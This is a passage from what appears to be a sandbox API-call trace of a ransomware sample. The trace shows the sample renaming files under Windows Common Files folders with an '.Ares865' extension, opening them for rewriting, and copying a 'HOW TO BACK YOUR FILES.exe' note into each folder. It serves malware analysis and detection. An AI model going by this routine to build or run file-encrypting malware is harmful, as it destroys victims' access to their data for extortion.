files\\system\\ole db\\oledbjvs.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9804) returned 1 [0145.781] lstrcpyW (in: lpString1=0x2cce464, lpString2="oledbvbs.inc" | out: lpString1="oledbvbs.inc") returned="oledbvbs.inc" [0145.781] lstrlenW (lpString="oledbvbs.inc") returned 12 [0145.781] lstrlenW (lpString="Ares865") returned 7 [0145.781] lstrcmpiW (lpString1="vbs.inc", lpString2="Ares865") returned 1 [0145.781] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.Ares865") returned 70 [0145.782] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc.ares865"), dwFlags=0x1) returned 1 [0145.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbvbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbvbs.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.790] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9975) returned 1 [0145.799] lstrcpyW (in: lpString1=0x2cce464, lpString2="sqloledb.dll" | out: lpString1="sqloledb.dll") returned="sqloledb.dll" [0145.799] lstrlenW (lpString="sqloledb.dll") returned 12 [0145.799] lstrlenW (lpString="Ares865") returned 7 [0145.799] lstrcmpiW (lpString1="edb.dll", lpString2="Ares865") returned 1 [0145.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.Ares865") returned 70 [0145.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll.ares865"), dwFlags=0x1) returned 1 [0145.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=921600) returned 1 [0145.936] lstrcpyW (in: lpString1=0x2cce464, lpString2="sqloledb.rll" | out: lpString1="sqloledb.rll") returned="sqloledb.rll" [0145.936] lstrlenW (lpString="sqloledb.rll") returned 12 [0145.936] lstrlenW (lpString="Ares865") returned 7 [0145.936] lstrcmpiW (lpString1="edb.rll", lpString2="Ares865") returned 1 [0145.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.Ares865") returned 70 [0145.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll.ares865"), dwFlags=0x1) returned 1 [0145.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqloledb.rll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqloledb.rll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0145.977] lstrcpyW (in: lpString1=0x2cce464, lpString2="sqlxmlx.dll" | out: lpString1="sqlxmlx.dll") returned="sqlxmlx.dll" [0145.977] lstrlenW (lpString="sqlxmlx.dll") returned 11 [0145.977] lstrlenW (lpString="Ares865") returned 7 [0145.977] lstrcmpiW (lpString1="mlx.dll", lpString2="Ares865") returned 1 [0145.978] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.Ares865") returned 69 [0145.978] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll.ares865"), dwFlags=0x1) returned 1 [0145.980] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.981] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=266240) returned 1 [0146.050] lstrcpyW (in: lpString1=0x2cce464, lpString2="sqlxmlx.rll" | out: lpString1="sqlxmlx.rll") returned="sqlxmlx.rll" [0146.050] lstrlenW (lpString="sqlxmlx.rll") returned 11 [0146.050] lstrlenW (lpString="Ares865") returned 7 [0146.050] lstrcmpiW (lpString1="mlx.rll", lpString2="Ares865") returned 1 [0146.051] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.Ares865") returned 69 [0146.051] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll.ares865"), dwFlags=0x1) returned 1 [0146.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.rll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.rll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.057] lstrcpyW (in: lpString1=0x2cce464, lpString2="xmlrw.dll" | out: lpString1="xmlrw.dll") returned="xmlrw.dll" [0146.057] lstrlenW (lpString="xmlrw.dll") returned 9 [0146.057] lstrlenW (lpString="Ares865") returned 7 [0146.057] lstrcmpiW (lpString1="lrw.dll", lpString2="Ares865") returned 1 [0146.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.Ares865") returned 67 [0146.057] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll.ares865"), dwFlags=0x1) returned 1 [0146.059] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.059] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=169496) returned 1 [0146.096] lstrcpyW (in: lpString1=0x2cce464, lpString2="xmlrwbin.dll" | out: lpString1="xmlrwbin.dll") returned="xmlrwbin.dll" [0146.096] lstrlenW (lpString="xmlrwbin.dll") returned 12 [0146.096] lstrlenW (lpString="Ares865") returned 7 [0146.096] lstrcmpiW (lpString1="bin.dll", lpString2="Ares865") returned 1 [0146.097] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.Ares865") returned 70 [0146.097] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll.ares865"), dwFlags=0x1) returned 1 [0146.099] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=123416) returned 1 [0146.123] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" [0146.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0146.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0146.123] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned 55 [0146.123] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" [0146.123] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0146.123] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0146.124] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0146.125] GetLastError () returned 0x0 [0146.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0146.125] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0146.125] CloseHandle (hObject=0x120) returned 1 [0146.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0146.125] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0146.125] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53473540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53473540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0146.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0146.126] lstrcpyW (in: lpString1=0x2cce470, lpString2="msdaorar.dll.mui" | out: lpString1="msdaorar.dll.mui") returned="msdaorar.dll.mui" [0146.126] lstrlenW (lpString="msdaorar.dll.mui") returned 16 [0146.126] lstrlenW (lpString="Ares865") returned 7 [0146.126] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.126] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.Ares865") returned 80 [0146.126] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.145] lstrcpyW (in: lpString1=0x2cce470, lpString2="msdasqlr.dll.mui" | out: lpString1="msdasqlr.dll.mui") returned="msdasqlr.dll.mui" [0146.145] lstrlenW (lpString="msdasqlr.dll.mui") returned 16 [0146.145] lstrlenW (lpString="Ares865") returned 7 [0146.145] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.Ares865") returned 80 [0146.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.147] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5632) returned 1 [0146.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.151] lstrcpyW (in: lpString1=0x2cce470, lpString2="oledb32r.dll.mui" | out: lpString1="oledb32r.dll.mui") returned="oledb32r.dll.mui" [0146.151] lstrlenW (lpString="oledb32r.dll.mui") returned 16 [0146.151] lstrlenW (lpString="Ares865") returned 7 [0146.151] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.Ares865") returned 80 [0146.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47616) returned 1 [0146.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.163] lstrcpyW (in: lpString1=0x2cce470, lpString2="sqloledb.rll.mui" | out: lpString1="sqloledb.rll.mui") returned="sqloledb.rll.mui" [0146.163] lstrlenW (lpString="sqloledb.rll.mui") returned 16 [0146.163] lstrlenW (lpString="Ares865") returned 7 [0146.163] lstrcmpiW (lpString1="rll.mui", lpString2="Ares865") returned 1 [0146.163] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.Ares865") returned 80 [0146.163] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.ares865"), dwFlags=0x1) returned 1 [0146.165] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.165] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44032) returned 1 [0146.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.179] lstrcpyW (in: lpString1=0x2cce470, lpString2="sqlxmlx.rll.mui" | out: lpString1="sqlxmlx.rll.mui") returned="sqlxmlx.rll.mui" [0146.179] lstrlenW (lpString="sqlxmlx.rll.mui") returned 15 [0146.179] lstrlenW (lpString="Ares865") returned 7 [0146.179] lstrcmpiW (lpString1="rll.mui", lpString2="Ares865") returned 1 [0146.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.Ares865") returned 79 [0146.180] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.ares865"), dwFlags=0x1) returned 1 [0146.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.182] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17920) returned 1 [0146.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.185] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc" [0146.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fd0 | out: hHeap=0x2b0000) returned 1 [0146.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0146.186] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned 48 [0146.186] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc" [0146.186] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0146.186] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0146.186] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0146.187] GetLastError () returned 0x0 [0146.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0146.187] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0146.188] CloseHandle (hObject=0x120) returned 1 [0146.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0146.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0146.188] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53473540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53473540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0146.188] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.188] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0146.188] lstrcpyW (in: lpString1=0x2cce462, lpString2="adcjavas.inc" | out: lpString1="adcjavas.inc") returned="adcjavas.inc" [0146.189] lstrlenW (lpString="adcjavas.inc") returned 12 [0146.189] lstrlenW (lpString="Ares865") returned 7 [0146.189] lstrcmpiW (lpString1="vas.inc", lpString2="Ares865") returned 1 [0146.189] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.Ares865") returned 69 [0146.189] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc.ares865"), dwFlags=0x1) returned 1 [0146.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcjavas.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcjavas.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=630) returned 1 [0146.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.196] lstrcpyW (in: lpString1=0x2cce462, lpString2="adcvbs.inc" | out: lpString1="adcvbs.inc") returned="adcvbs.inc" [0146.196] lstrlenW (lpString="adcvbs.inc") returned 10 [0146.196] lstrlenW (lpString="Ares865") returned 7 [0146.196] lstrcmpiW (lpString1="vbs.inc", 